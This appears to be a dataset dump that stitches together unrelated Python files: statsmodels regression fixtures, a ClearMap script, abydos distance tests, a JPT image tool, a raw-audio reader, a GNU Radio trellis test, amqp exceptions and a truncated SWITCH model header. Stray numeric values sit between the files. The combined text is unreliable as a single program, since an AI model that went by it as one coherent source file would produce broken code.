heteroskedasticity and clustering on year", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock, dkraay(5) small", cmd = "ivreg2", model = "ols", depvar = "invest", vcetype = "Robust", vce = "cluster ac bartlett bw=5", partialsmall = "small", small = "small", ivar = "company", tvar = "year", kernel = "Bartlett", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ .11556215606596, .0138548615926, 8.3409101775303, 8.967911239e-08, .08656359748216, .14456071464977, 19, 2.0930240544083, 0, .23067848754982, .0508450956047, 4.5368876743442, .00022550505646, .12425847940049, .33709849569915, 19, 2.0930240544083, 0, -42.714369016733, 12.570359466158, -3.3980228752988, .00301793225123, -69.02443375196, -16.404304281506, 19, 2.0930240544083, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00019195718975, -.00037919048186, -.07154282413568, -.00037919048186, .00258522374705, -.34445964542925, -.07154282413568, -.34445964542925, 158.01393710842]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_nw_groupsum4_ivreg_small = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) ######################### WLS est = dict( N = 200, df_m = 2, df_r = 197, F = 158.2726503915062, r2 = .7728224625923459, rmse = 35.1783035325949, mss = 829335.6968772264, rss = 243790.0687679817, r2_a = .7705160916541971, ll = -994.3622459900876, ll_0 = -1142.564592396746, rank = 3, cmdline = "regress invest mvalue kstock [aw=1/mvalue], robust", title = "Linear regression", marginsok = "XB default", vce = "robust", depvar = "invest", cmd 
= "regress", properties = "b V", predict = "regres_p", model = "ols", estat_cmd = "regress_estat", wexp = "= 1/mvalue", wtype = "aweight", vcetype = "Robust", ) params_table = np.array([ .11694307068216, .00768545583365, 15.2161528494, 4.371656843e-35, .10178674436759, .13209939699674, 197, 1.9720790337785, 0, .10410756769914, .00986959606725, 10.548310892334, 6.565731752e-21, .08464394422305, .12357119117523, 197, 1.9720790337785, 0, -9.2723336171089, 2.3458404391932, -3.9526702081656, .00010767530575, -13.898516363832, -4.6461508703863, 197, 1.9720790337785, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00005906623137, 6.805470065e-06, -.01210153268743, 6.805470065e-06, .00009740892653, -.01511046663892, -.01210153268743, -.01511046663892, 5.502967366154]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_hc1_wls_small = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N_clust = 10, N = 200, df_m = 2, df_r = 9, F = 22.90591346432732, r2 = .7728224625923459, rmse = 35.1783035325949, mss = 829335.6968772264, rss = 243790.0687679817, r2_a = .7705160916541971, ll = -994.3622459900876, ll_0 = -1142.564592396746, rank = 3, cmdline = "regress invest mvalue kstock[aw=1/mvalue], vce(cluster company)", title = "Linear regression", marginsok = "XB default", vce = "cluster", depvar = "invest", cmd = "regress", properties = "b V", predict = "regres_p", model = "ols", estat_cmd = "regress_estat", wexp = "= 1/mvalue", wtype = "aweight", vcetype = "Robust", clustvar = "company", ) params_table = np.array([ .11694307068216, .02609630113434, 4.4812124936848, .00152974827456, .05790913614858, .17597700521575, 9, 2.2621571627982, 0, .10410756769914, 
.02285882773869, 4.5543703679489, .00137730504553, .05239730679689, .15581782860139, 9, 2.2621571627982, 0, -9.2723336171089, 5.7204731422962, -1.6209032690934, .13948922172294, -22.212942910549, 3.6682756763312, 9, 2.2621571627982, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00068101693289, -.00006496077364, -.08926939086077, -.00006496077364, .00052252600559, -.0697116307149, -.08926939086077, -.0697116307149, 32.723812971732]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster_wls_small = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, N_clust = 10, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .772822462592346, rmse = 34.91346937558495, rss = 243790.0687679817, mss = 829335.6968772268, r2_a = .7705160916541972, F = 22.9059134643273, Fp = .000294548654088, Fdf1 = 2, Fdf2 = 9, yy = 1401938.856802022, yyc = 1073125.765645209, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -994.3622459900874, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .772822462592346, r2u = .8261050632949187, clustvar = "company", hacsubtitleV = "Statistics robust to heteroskedasticity and clustering on company", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock [aw=1/mvalue], cluster(company)", cmd = "ivreg2", wtype = "aweight", wexp = "=1/mvalue", model = "ols", depvar = "invest", vcetype = "Robust", vce = "robust cluster", partialsmall = "small", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ .11694307068216, 
.02463240320082, 4.7475298990826, 2.059159576e-06, .06866444755588, .16522169380844, np.nan, 1.9599639845401, 0, .10410756769914, .02157653909108, 4.8250355286218, 1.399783125e-06, .06181832816961, .14639680722867, np.nan, 1.9599639845401, 0, -9.2723336171089, 5.3995775192484, -1.7172331694572, .08593657730569, -19.855311086568, 1.31064385235, np.nan, 1.9599639845401, 0]).reshape(3,9) params_table_colnames = 'b se z pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00060675528745, -.00005787711139, -.07953498994782, -.00005787711139, .00046554703915, -.06210991017966, -.07953498994782, -.06210991017966, 29.155437386372]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster_wls_large = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est )
0.031511
# -*- coding: utf-8 -*- """ Created on Mon Jul 18 13:48:09 2016 @author: ckirst """ # test cropping import ClearMap.IO as io reload(io); import ClearMap.Settings as settings import ClearMap.Alignment.Stitching as st import os import numpy as np datadir ='/home/mtllab/Documents/th/'; fn = os.path.join(datadir, r'160412_mosaic_15-20-19/15-20-19_mosaic_UltraII\[(?P<row>\d{2}) x (?P<col>\d{2})\]_C00_xyz-Table Z(?P<z>\d{4}).ome.tif') _, gr = st.findFileList(fn , sort = True, groups = ['row','col'], absolute = True) groups = []; for i in range(gr.shape[1]): groups.append(np.unique(gr[:,i])); print groups for i in groups[0]: for j in groups[1]: fileExpression = os.path.join(datadir, r'160412_mosaic_15-20-19/15-20-19_mosaic_UltraII\[%s x %s]_C00_xyz-Table Z\d{4}.ome.tif' % (i,j)) io.dataSize(fileExpression) io.readMetaData(fileExpression, info = ['size', 'overlap', 'resolution']) import ClearMap.IO.FileList as fl; reload(fl) fncrop = os.path.join(datadir, r'cropped/15-20-19_mosaic_UltraII_%s_x_%s_C00_xyz-Table Z\d{4}.ome.tif' % (i,j)) fc = fl.cropData(fileExpression, fncrop, x = (400, -400), y = (550, -550), adjustOverlap = True, processes = all) #fc1 = fl.firstFile(fc) #io.readMetaData(fc1, info = ['overlap', 'resolution', 'size']);
0.031065
# Copyright 2019-2020 by Christopher C. Little. # This file is part of Abydos. # # Abydos is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Abydos is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Abydos. If not, see <http://www.gnu.org/licenses/>. """abydos.tests.distance.test_distance_cole. This module contains unit tests for abydos.distance.Cole """ import unittest from abydos.distance import Cole class ColeTestCases(unittest.TestCase): """Test Cole functions. abydos.distance.Cole """ cmp = Cole() cmp_no_d = Cole(alphabet=0) cmp_a16 = Cole(alphabet=16) def test_cole_sim(self): """Test abydos.distance.Cole.sim.""" # Base cases self.assertEqual(self.cmp.sim('', ''), 1.0) self.assertEqual(self.cmp.sim('a', ''), 0.5) self.assertEqual(self.cmp.sim('', 'a'), 0.5) self.assertEqual(self.cmp.sim('abc', ''), 0.5) self.assertEqual(self.cmp.sim('', 'abc'), 0.5) self.assertEqual(self.cmp.sim('abc', 'abc'), 1.0) self.assertEqual(self.cmp.sim('abcd', 'efgh'), 0.0) self.assertAlmostEqual(self.cmp.sim('Nigel', 'Niall'), 0.7480719794) self.assertAlmostEqual(self.cmp.sim('Niall', 'Nigel'), 0.7480719794) self.assertAlmostEqual(self.cmp.sim('Colin', 'Coiln'), 0.7480719794) self.assertAlmostEqual(self.cmp.sim('Coiln', 'Colin'), 0.7480719794) self.assertAlmostEqual( self.cmp.sim('ATCAACGAGT', 'AACGATTAG'), 0.8158327461 ) # Tests with alphabet=0 (no d factor) self.assertEqual(self.cmp_no_d.sim('', ''), 1.0) self.assertEqual(self.cmp_no_d.sim('a', ''), 0.5) self.assertEqual(self.cmp_no_d.sim('', 'a'), 0.5) self.assertEqual(self.cmp_no_d.sim('abc', 
''), 0.5) self.assertEqual(self.cmp_no_d.sim('', 'abc'), 0.5) self.assertEqual(self.cmp_no_d.sim('abc', 'abc'), 1.0) self.assertEqual(self.cmp_no_d.sim('abcd', 'efgh'), 0.0) self.assertAlmostEqual(self.cmp_no_d.sim('Nigel', 'Niall'), 0.0) self.assertAlmostEqual(self.cmp_no_d.sim('Niall', 'Nigel'), 0.0) self.assertAlmostEqual(self.cmp_no_d.sim('Colin', 'Coiln'), 0.0) self.assertAlmostEqual(self.cmp_no_d.sim('Coiln', 'Colin'), 0.0) self.assertAlmostEqual( self.cmp_no_d.sim('ATCAACGAGT', 'AACGATTAG'), 0.0 ) # cases b & c self.assertAlmostEqual( self.cmp_a16.sim('ATCAACGAGT', 'AACGATTAG'), 0.5151515151515151 ) self.assertAlmostEqual( self.cmp_a16.sim('ATCAACGAGT', 'AACGAACGATTAGATTAG'), 0.2976190476190476, ) def test_cole_dist(self): """Test abydos.distance.Cole.dist.""" # Base cases self.assertEqual(self.cmp.dist('', ''), 0.0) self.assertEqual(self.cmp.dist('a', ''), 0.5) self.assertEqual(self.cmp.dist('', 'a'), 0.5) self.assertEqual(self.cmp.dist('abc', ''), 0.5) self.assertEqual(self.cmp.dist('', 'abc'), 0.5) self.assertEqual(self.cmp.dist('abc', 'abc'), 0.0) self.assertEqual(self.cmp.dist('abcd', 'efgh'), 1.0) self.assertAlmostEqual(self.cmp.dist('Nigel', 'Niall'), 0.2519280206) self.assertAlmostEqual(self.cmp.dist('Niall', 'Nigel'), 0.2519280206) self.assertAlmostEqual(self.cmp.dist('Colin', 'Coiln'), 0.2519280206) self.assertAlmostEqual(self.cmp.dist('Coiln', 'Colin'), 0.2519280206) self.assertAlmostEqual( self.cmp.dist('ATCAACGAGT', 'AACGATTAG'), 0.1841672539 ) # Tests with alphabet=0 (no d factor) self.assertEqual(self.cmp_no_d.dist('', ''), 0.0) self.assertEqual(self.cmp_no_d.dist('a', ''), 0.5) self.assertEqual(self.cmp_no_d.dist('', 'a'), 0.5) self.assertEqual(self.cmp_no_d.dist('abc', ''), 0.5) self.assertEqual(self.cmp_no_d.dist('', 'abc'), 0.5) self.assertEqual(self.cmp_no_d.dist('abc', 'abc'), 0.0) self.assertEqual(self.cmp_no_d.dist('abcd', 'efgh'), 1.0) self.assertAlmostEqual(self.cmp_no_d.dist('Nigel', 'Niall'), 1.0) 
self.assertAlmostEqual(self.cmp_no_d.dist('Niall', 'Nigel'), 1.0) self.assertAlmostEqual(self.cmp_no_d.dist('Colin', 'Coiln'), 1.0) self.assertAlmostEqual(self.cmp_no_d.dist('Coiln', 'Colin'), 1.0) self.assertAlmostEqual( self.cmp_no_d.dist('ATCAACGAGT', 'AACGATTAG'), 1.0 ) def test_cole_corr(self): """Test abydos.distance.Cole.corr.""" # Base cases self.assertEqual(self.cmp.corr('', ''), 1.0) self.assertEqual(self.cmp.corr('a', ''), 0.0) self.assertEqual(self.cmp.corr('', 'a'), 0.0) self.assertEqual(self.cmp.corr('abc', ''), 0.0) self.assertEqual(self.cmp.corr('', 'abc'), 0.0) self.assertEqual(self.cmp.corr('abc', 'abc'), 1.0) self.assertEqual(self.cmp.corr('abcd', 'efgh'), -1.0) self.assertAlmostEqual(self.cmp.corr('Nigel', 'Niall'), 0.4961439589) self.assertAlmostEqual(self.cmp.corr('Niall', 'Nigel'), 0.4961439589) self.assertAlmostEqual(self.cmp.corr('Colin', 'Coiln'), 0.4961439589) self.assertAlmostEqual(self.cmp.corr('Coiln', 'Colin'), 0.4961439589) self.assertAlmostEqual( self.cmp.corr('ATCAACGAGT', 'AACGATTAG'), 0.6316654921 ) # Tests with alphabet=0 (no d factor) self.assertEqual(self.cmp_no_d.corr('', ''), 1.0) self.assertEqual(self.cmp_no_d.corr('a', ''), 0.0) self.assertEqual(self.cmp_no_d.corr('', 'a'), 0.0) self.assertEqual(self.cmp_no_d.corr('abc', ''), 0.0) self.assertEqual(self.cmp_no_d.corr('', 'abc'), 0.0) self.assertEqual(self.cmp_no_d.corr('abc', 'abc'), 1.0) self.assertEqual(self.cmp_no_d.corr('abcd', 'efgh'), -1.0) self.assertAlmostEqual(self.cmp_no_d.corr('Nigel', 'Niall'), -1.0) self.assertAlmostEqual(self.cmp_no_d.corr('Niall', 'Nigel'), -1.0) self.assertAlmostEqual(self.cmp_no_d.corr('Colin', 'Coiln'), -1.0) self.assertAlmostEqual(self.cmp_no_d.corr('Coiln', 'Colin'), -1.0) self.assertAlmostEqual( self.cmp_no_d.corr('ATCAACGAGT', 'AACGATTAG'), -1.0 ) if __name__ == '__main__': unittest.main()
0
import os import struct import sys VERSION = "2.0" from jpt import Jpt def process(): print "-------------------------------------------------------------------------------" print "| April JPT Tool " + VERSION print "| JPT format version: " + str(Jpt.Version) print "-------------------------------------------------------------------------------" if len(sys.argv) < 2: info() elif sys.argv[1].lower() in ("help", "-h", "/h", "-?", "/?"): help() elif sys.argv[1].lower() == "merge": if len(sys.argv) != 5: info() return merge(sys.argv[2:len(sys.argv)]) elif sys.argv[1].lower() == "split": if len(sys.argv) != 5: info() return split(sys.argv[2:len(sys.argv)]) elif sys.argv[1].lower() == "prepare": if checkPIL(): if len(sys.argv) != 5 and len(sys.argv) != 6: info() return prepare(sys.argv[2:len(sys.argv)]) elif sys.argv[1].lower() == "convert": if checkPIL(): if len(sys.argv) != 4 and len(sys.argv) != 5: info() return convert(sys.argv[2:len(sys.argv)]) else: info() def merge(args): print Jpt.merge(args[0], args[1], args[2]) def split(args): print Jpt.split(args[0], args[1], args[2]) def prepare(args): if checkPIL(): quality = 95 if len(args) == 4: quality = int(args[3]) from pilconv import PilConv print PilConv.convert(args[0], args[1], args[2], quality) def convert(args): if checkPIL(): image = args.pop(1) jpeg = image + "__tmp__.jpg" png = image + "__tmp__.png" args.insert(1, jpeg) args.insert(2, png) prepare(args) merge([image, jpeg, png]) os.remove(jpeg) os.remove(png) def checkPIL(): try: import Image except: print "ERROR! Please install PIL to use the 'convert' command." 
print "http://www.pythonware.com/products/pil" return False return True def info(): print "" print "usage: jpt-tool.py merge JPT_FILENAME JPEG_FILENAME PNG_FILNAME" print " jpt-tool.py split JPT_FILENAME JPEG_FILENAME PNG_FILNAME" print " jpt-tool.py prepare FILENAME JPEG_FILENAME PNG_FILNAME [JPEG_QUALITY]" print " jpt-tool.py convert FILENAME JPT_FILENAME [JPEG_QUALITY]" print " use 'jpt-tool.py -h' for more information" print "" if os.name != 'posix': os.system("pause") def help(): print "" print "usage: jpt-tool.py merge JPT_FILENAME JPEG_FILENAME PNG_FILNAME" print " jpt-tool.py split JPT_FILENAME JPEG_FILENAME PNG_FILNAME" print " jpt-tool.py prepare FILENAME JPEG_FILENAME PNG_FILNAME [JPEG_QUALITY]" print " jpt-tool.py convert FILENAME JPT_FILENAME [JPEG_QUALITY]" print "" print "commands:" print "merge - merges a JPEG and a PNG file into a JPT file" print "split - splits a JPT file to a JPEG and a PNG file" print "prepare - creates PNG and JPEG images from an image file (requires PIL installed)" print "convert - creates a JPT image from an image file direclty using 'prepare' (requires PIL installed)" print "" print "JPT_FILENAME - JPT filename to use in the process" print "JPEG_FILENAME - JPEG filename to use in the process" print "PNG_FILENAME - PNG filename to use in the process" print "FILENAME - image filename (any format) to use in the process" print "JPEG_QUALITY - value from 1 (worst) to 95 (best) for JPEG compression quality (default = 95); values above 95 should be avoided, 100 completely disables the quantization stage" print "" os.system("pause") process()
0.029989
#!/usr/bin/env python
# vim: sw=4:ts=4:sts=4:fdm=indent:fdl=0:
# -*- coding: UTF8 -*-
#
# A module to handle the reading of raw files.
# Copyright (C) 2012 Josiah Gordon <josiahg@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

""" A module for reading raws.

Exposes RawFile, a file-like wrapper around headerless (raw) audio data,
registered with the io framework via __supported_dict.
"""

from os.path import getsize as os_getsize

from .io_base import AudioIO, io_wrapper

# Registration info consumed by the io framework: file extension(s) this
# module handles and the name of the handler class.
__supported_dict = {
    'ext': ['.raw'],
    'handler': 'RawFile'
}


class RawFile(AudioIO):
    """ A file like object for reading raws.

    Raw files carry no header, so depth/rate/channels must be supplied by
    the caller; they default to 16-bit / 44100 Hz / stereo.
    """

    # Both reading and writing are supported
    _supported_modes = 'rw'

    def __init__(self, filename, mode='r', depth=16, rate=44100, channels=2,
                 **kwargs):
        """ RawFile(filename, mode='r', depth=16, rate=44100, channels=2) ->
        Initialize the playback settings of the player.

        In read mode the stream length is simply the file size in bytes,
        since raw audio has no header.
        """
        super(RawFile, self).__init__(filename, mode, depth, rate, channels)

        if 'r' in mode:
            self._length = os_getsize(filename)

        self._file = self._open(filename)

        self.seek = self._file.seek
        self.tell = self._file.tell
        # NOTE(review): this instance attribute shadows the io_wrapper
        # decorated write() method defined below, bypassing whatever checks
        # io_wrapper performs -- confirm this is intentional.
        self.write = self._file.write

    def _set_position(self, position):
        """ Change the position of playback.
        """
        self._file.seek(position)

    def _get_position(self):
        """ Updates the position variable.
        """
        return self._file.tell()

    def _open(self, filename):
        """ _open(filename) -> Load the specified file.

        Opens the file unbuffered in binary mode using the instance's mode
        ('r' or 'w') and marks the stream as open.
        """
        self._closed = False

        return open(filename, '%sb' % self._mode, buffering=0)

    @io_wrapper
    def write(self, data: bytes) -> int:
        """ write(data) -> Write data to raw audio file.
        """
        return self._file.write(data)

    @io_wrapper
    def read(self, size: int) -> bytes:
        """ read(size) -> Reads size amount of data and returns it.

        When the end of the file is reached and looping is enabled
        (self._loops == -1 for infinite, or the loop count is not yet
        exhausted), rewinds to the start before reading; otherwise reads
        at EOF return b''.
        """
        # presumably self.position/_loops/_loop_count are maintained by the
        # AudioIO base class -- TODO confirm.
        if self.position >= self._length:
            if self._loops == -1 or self._loop_count < self._loops:
                self._loop_count += 1
                self.seek(0)

        return self._file.read(size)

    def close(self):
        """ close -> Closes and cleans up.
        """
        if not self.closed:
            self._file.close()

            self._closed = True
0
#!/usr/bin/env python from gnuradio import gr from gnuradio import audio from gnuradio import trellis, digital, blocks from gnuradio import eng_notation import math import sys import random import fsm_utils try: from gnuradio import analog except ImportError: sys.stderr.write("Error: Program requires gr-analog.\n") sys.exit(1) def run_test (f,Kb,bitspersymbol,K,dimensionality,constellation,N0,seed): tb = gr.top_block () # TX src = blocks.lfsr_32k_source_s() src_head = blocks.head (gr.sizeof_short,Kb/16) # packet size in shorts s2fsmi = blocks.packed_to_unpacked_ss(bitspersymbol,gr.GR_MSB_FIRST) # unpack shorts to symbols compatible with the FSM input cardinality enc = trellis.encoder_ss(f,0) # initial state = 0 mod = digital.chunks_to_symbols_sf(constellation,dimensionality) # CHANNEL add = blocks.add_ff() noise = analog.noise_source_f(analog.GR_GAUSSIAN,math.sqrt(N0/2),seed) # RX metrics = trellis.metrics_f(f.O(),dimensionality,constellation,digital.TRELLIS_EUCLIDEAN) # data preprocessing to generate metrics for Viterbi va = trellis.viterbi_s(f,K,0,-1) # Put -1 if the Initial/Final states are not set. fsmi2s = blocks.unpacked_to_packed_ss(bitspersymbol,gr.GR_MSB_FIRST) # pack FSM input symbols to shorts dst = blocks.check_lfsr_32k_s(); tb.connect (src,src_head,s2fsmi,enc,mod) tb.connect (mod,(add,0)) tb.connect (noise,(add,1)) tb.connect (add,metrics) tb.connect (metrics,va,fsmi2s,dst) tb.run() # A bit of cheating: run the program once and print the # final encoder state. 
# Then put it as the last argument in the viterbi block #print "final state = " , enc.ST() ntotal = dst.ntotal () nright = dst.nright () runlength = dst.runlength () return (ntotal,ntotal-nright) def main(args): nargs = len (args) if nargs == 3: fname=args[0] esn0_db=float(args[1]) # Es/No in dB rep=int(args[2]) # number of times the experiment is run to collect enough errors else: sys.stderr.write ('usage: test_tcm.py fsm_fname Es/No_db repetitions\n') sys.exit (1) # system parameters f=trellis.fsm(fname) # get the FSM specification from a file Kb=1024*16 # packet size in bits (make it multiple of 16 so it can be packed in a short) bitspersymbol = int(round(math.log(f.I())/math.log(2))) # bits per FSM input symbol K=Kb/bitspersymbol # packet size in trellis steps modulation = fsm_utils.psk4 # see fsm_utlis.py for available predefined modulations dimensionality = modulation[0] constellation = modulation[1] if len(constellation)/dimensionality != f.O(): sys.stderr.write ('Incompatible FSM output cardinality and modulation size.\n') sys.exit (1) # calculate average symbol energy Es = 0 for i in range(len(constellation)): Es = Es + constellation[i]**2 Es = Es / (len(constellation)/dimensionality) N0=Es/pow(10.0,esn0_db/10.0); # noise variance tot_s=0 terr_s=0 for i in range(rep): (s,e)=run_test(f,Kb,bitspersymbol,K,dimensionality,constellation,N0,-long(666+i)) # run experiment with different seed to get different noise realizations tot_s=tot_s+s terr_s=terr_s+e if (i%100==0): print i,s,e,tot_s,terr_s, '%e' % ((1.0*terr_s)/tot_s) # estimate of the (short) error rate print tot_s,terr_s, '%e' % ((1.0*terr_s)/tot_s) if __name__ == '__main__': main (sys.argv[1:])
0.030329
"""Exceptions used by amqp""" # Copyright (C) 2007-2008 Barry Pederson <bp@barryp.org> # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 from __future__ import absolute_import from struct import pack, unpack __all__ = [ 'AMQPError', 'ConnectionError', 'ChannelError', 'RecoverableConnectionError', 'IrrecoverableConnectionError', 'RecoverableChannelError', 'IrrecoverableChannelError', 'ConsumerCancelled', 'ContentTooLarge', 'NoConsumers', 'ConnectionForced', 'InvalidPath', 'AccessRefused', 'NotFound', 'ResourceLocked', 'PreconditionFailed', 'FrameError', 'FrameSyntaxError', 'InvalidCommand', 'ChannelNotOpen', 'UnexpectedFrame', 'ResourceError', 'NotConfirmed', 'NotAllowed', 'AMQPNotImplementedError', 'InternalError', ] class AMQPError(Exception): code = 0 def __init__(self, reply_text=None, method_sig=None, method_name=None, reply_code=None): self.message = reply_text self.reply_code = reply_code or self.code self.reply_text = reply_text self.method_sig = method_sig self.method_name = method_name or '' if method_sig and not self.method_name: self.method_name = METHOD_NAME_MAP.get(method_sig, '') Exception.__init__(self, reply_code, reply_text, method_sig, self.method_name) def __str__(self): if self.method: return '{0.method}: ({0.reply_code}) {0.reply_text}'.format(self) return self.reply_text or 
'<AMQPError: unknown error>' @property def method(self): return self.method_name or self.method_sig class ConnectionError(AMQPError): pass class ChannelError(AMQPError): pass class RecoverableChannelError(ChannelError): pass class IrrecoverableChannelError(ChannelError): pass class RecoverableConnectionError(ConnectionError): pass class IrrecoverableConnectionError(ConnectionError): pass class Blocked(RecoverableConnectionError): pass class ConsumerCancelled(RecoverableConnectionError): pass class ContentTooLarge(RecoverableChannelError): code = 311 class NoConsumers(RecoverableChannelError): code = 313 class ConnectionForced(RecoverableConnectionError): code = 320 class InvalidPath(IrrecoverableConnectionError): code = 402 class AccessRefused(IrrecoverableChannelError): code = 403 class NotFound(IrrecoverableChannelError): code = 404 class NotConfirmed(RecoverableConnectionError): pass class ResourceLocked(RecoverableChannelError): code = 405 class PreconditionFailed(IrrecoverableChannelError): code = 406 class FrameError(IrrecoverableConnectionError): code = 501 class FrameSyntaxError(IrrecoverableConnectionError): code = 502 class InvalidCommand(IrrecoverableConnectionError): code = 503 class ChannelNotOpen(IrrecoverableConnectionError): code = 504 class UnexpectedFrame(IrrecoverableConnectionError): code = 505 class ResourceError(RecoverableConnectionError): code = 506 class NotAllowed(IrrecoverableConnectionError): code = 530 class AMQPNotImplementedError(IrrecoverableConnectionError): code = 540 class InternalError(IrrecoverableConnectionError): code = 541 ERROR_MAP = { 311: ContentTooLarge, 313: NoConsumers, 320: ConnectionForced, 402: InvalidPath, 403: AccessRefused, 404: NotFound, 405: ResourceLocked, 406: PreconditionFailed, 501: FrameError, 502: FrameSyntaxError, 503: InvalidCommand, 504: ChannelNotOpen, 505: UnexpectedFrame, 506: ResourceError, 530: NotAllowed, 540: AMQPNotImplementedError, 541: InternalError, } def error_for_code(code, text, method, 
default): try: return ERROR_MAP[code](text, method, reply_code=code) except KeyError: return default(text, method, reply_code=code) def raise_for_code(code, text, method, default): raise error_for_code(code, text, method, default) METHOD_NAME_MAP = { (10, 10): 'Connection.start', (10, 11): 'Connection.start_ok', (10, 20): 'Connection.secure', (10, 21): 'Connection.secure_ok', (10, 30): 'Connection.tune', (10, 31): 'Connection.tune_ok', (10, 40): 'Connection.open', (10, 41): 'Connection.open_ok', (10, 50): 'Connection.close', (10, 51): 'Connection.close_ok', (20, 10): 'Channel.open', (20, 11): 'Channel.open_ok', (20, 20): 'Channel.flow', (20, 21): 'Channel.flow_ok', (20, 40): 'Channel.close', (20, 41): 'Channel.close_ok', (30, 10): 'Access.request', (30, 11): 'Access.request_ok', (40, 10): 'Exchange.declare', (40, 11): 'Exchange.declare_ok', (40, 20): 'Exchange.delete', (40, 21): 'Exchange.delete_ok', (40, 30): 'Exchange.bind', (40, 31): 'Exchange.bind_ok', (40, 40): 'Exchange.unbind', (40, 41): 'Exchange.unbind_ok', (50, 10): 'Queue.declare', (50, 11): 'Queue.declare_ok', (50, 20): 'Queue.bind', (50, 21): 'Queue.bind_ok', (50, 30): 'Queue.purge', (50, 31): 'Queue.purge_ok', (50, 40): 'Queue.delete', (50, 41): 'Queue.delete_ok', (50, 50): 'Queue.unbind', (50, 51): 'Queue.unbind_ok', (60, 10): 'Basic.qos', (60, 11): 'Basic.qos_ok', (60, 20): 'Basic.consume', (60, 21): 'Basic.consume_ok', (60, 30): 'Basic.cancel', (60, 31): 'Basic.cancel_ok', (60, 40): 'Basic.publish', (60, 50): 'Basic.return', (60, 60): 'Basic.deliver', (60, 70): 'Basic.get', (60, 71): 'Basic.get_ok', (60, 72): 'Basic.get_empty', (60, 80): 'Basic.ack', (60, 90): 'Basic.reject', (60, 100): 'Basic.recover_async', (60, 110): 'Basic.recover', (60, 111): 'Basic.recover_ok', (60, 120): 'Basic.nack', (90, 10): 'Tx.select', (90, 11): 'Tx.select_ok', (90, 20): 'Tx.commit', (90, 21): 'Tx.commit_ok', (90, 30): 'Tx.rollback', (90, 31): 'Tx.rollback_ok', (85, 10): 'Confirm.select', (85, 11): 'Confirm.select_ok', 
} for _method_id, _method_name in list(METHOD_NAME_MAP.items()): METHOD_NAME_MAP[unpack('>I', pack('>HH', *_method_id))[0]] = _method_name
0
# Copyright 2015 The Switch Authors. All rights reserved. # Licensed under the Apache License, Version 2, which is in the LICENSE file. """ Defines model components to describe generation projects build-outs for the SWITCH-Pyomo model. This module requires either project.unitcommit or project.no_commit to constrain project dispatch to either committed or installed capacity. SYNOPSIS >>> from switch_mod.utilities import define_AbstractModel >>> model = define_AbstractModel( ... 'timescales', 'financials', 'load_zones', 'fuels', ... 'gen_tech', 'project.build', 'project.dispatch') >>> instance = model.load_inputs(inputs_dir='test_dat') """ import os from pyomo.environ import * def define_components(mod): """ Adds components to a Pyomo abstract model object to describe the dispatch decisions and constraints of generation and storage projects. Unless otherwise stated, all power capacity is specified in units of MW and all sets and parameters are mandatory. PROJ_DISPATCH_POINTS is a set of projects and timepoints in which they can be dispatched. A dispatch decisions is made for each member of this set. Members of this set can be abbreviated as (proj, t) or (prj, t). ProjCapacityTP[(proj, t) in PROJ_DISPATCH_POINTS] is the same as 